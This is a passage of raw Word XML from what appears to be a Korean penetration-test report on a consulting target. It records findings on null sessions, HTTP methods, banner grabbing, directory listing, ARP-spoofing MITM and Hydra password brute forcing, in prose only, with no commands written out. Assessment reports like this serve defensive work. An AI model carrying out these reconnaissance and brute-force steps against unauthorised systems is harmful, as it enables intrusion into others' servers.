          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 되지 않고 방화벽이 없다면 열려 있는 P</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ort</w:t>
      </w:r>
      <w:r w:rsidR="008F510A" w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들을 확인할 수 있다는 것을 알 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F510A" w:rsidRDefault="008E3ABE" w:rsidP="008F510A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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE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92680" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20" name="그림 20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AB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31720" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="그림 21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BE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE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>W</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indow</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">를 사용하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버에 N</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ull Session</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">은 연결이 되지만 연결된 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Null Session</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로는 서버의 접근할 수 없음</w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0048009A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">아래 링크에서 확인 가능 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://social.technet.microsoft.com/Forums/windowsserver/en-US/841523db-8c4b-43a0-9f28-be7270f92e2b/disable-server-2008-null-sessions?forum=winservergen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="008E3ABE" w:rsidP="008E3ABE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E3ABE" w:rsidRDefault="004A79E9" w:rsidP="0040771B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4A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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4A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">UT, Delete </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ethod </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="0010076E" w:rsidP="004A79E9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6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6E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E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10076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>메인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페이지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접속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후</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Paros</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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통해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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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확인하면</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전이</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인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것을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확인할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수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있</w:t>
      </w:r>
      <w:r w:rsidRPr="0010076E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="0010076E" w:rsidP="004A79E9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6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6E" w:rsidRDefault="0010076E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19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76E" w:rsidRPr="00056274" w:rsidRDefault="00056274" w:rsidP="0010076E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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UT, Delete Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 허용안됨</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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anner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9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651760" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="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Pr="004A79E9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 xml:space="preserve">현재 컨설팅 대상의 웹 페이지에 접속 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Response </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 확인하면 헤더를 통해 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>종류,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버전 정보를 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:ind w:left="804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3497580" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="23" name="그림 23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Default="004A79E9" w:rsidP="004A79E9">
      <w:pPr>
        <w:ind w:left="804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3497580" cy="274320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="24" name="그림 24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>H</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ttpint </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">툴을 이용하면 서버의 정보를 알아올 수 있는데 컨설팅 대상의 메인 페이지로 접속 시 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>되는 것과 서버,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 정보가 노출되는 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9" w:rsidP="004A79E9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3505200" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="0" b="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컨설팅 대상의 웹 페이지 접속 후 기본 페이지에서 가지고 있지 않을 만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을 불러오면 웹 페이지에 오류 메시지가 출력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오류 메시지를 확인해보면 서버와 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">의 정보를 확인할 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRPr="00C73585" w:rsidRDefault="004A79E9" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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4A79E9">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Directory Listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A79E9" w:rsidRDefault="004A79E9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876800" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="그림 26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Pr="00C73585" w:rsidRDefault="004A79E9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ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>현재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메인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페이지가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위치한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Main </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory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상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szCs w:val="20"/>
        </w:rPr>
        <w:t>Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> home</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로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접속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해보면</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Listing </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이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실행되는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것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확인</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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이를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통해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기타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다른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Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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구조를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파악할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수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있음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</w:p>
    <w:p w:rsidR="004A79E9" w:rsidRP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4A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr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4A79E9" w:rsidRDefault="004A79E9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441960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Pr="00C73585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ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용한</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격으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Sniffing</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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성공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Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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확인할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수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있었지만</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용한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암호화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통신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하고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있었기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때문에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Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="004A79E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의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내용에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포함되어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있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세션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정보를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알아내지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못함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRPr="00C73585" w:rsidRDefault="00C73585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C73585">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P / Password Brute Forcing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585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10100" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="그림 28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P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73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>모의해킹에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필요한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정상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로그인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정보를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확인하기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위해서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정상적인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방법으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이고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비밀번호가</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>인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계정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생성</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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후에</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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이용해</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">roxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버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설정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상태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정상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로그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로그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실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응답</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">acket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>내용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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRP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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로그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실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에만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확인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있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문자열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찾아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Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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공격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때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용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C7358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02480" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="29" name="그림 29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585"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572000" cy="109437"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="30" name="그림 30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Default="00C73585" w:rsidP="00C73585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10100" cy="145363"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="31" name="그림 31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P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73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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사용해서</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정과</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정에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대한</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
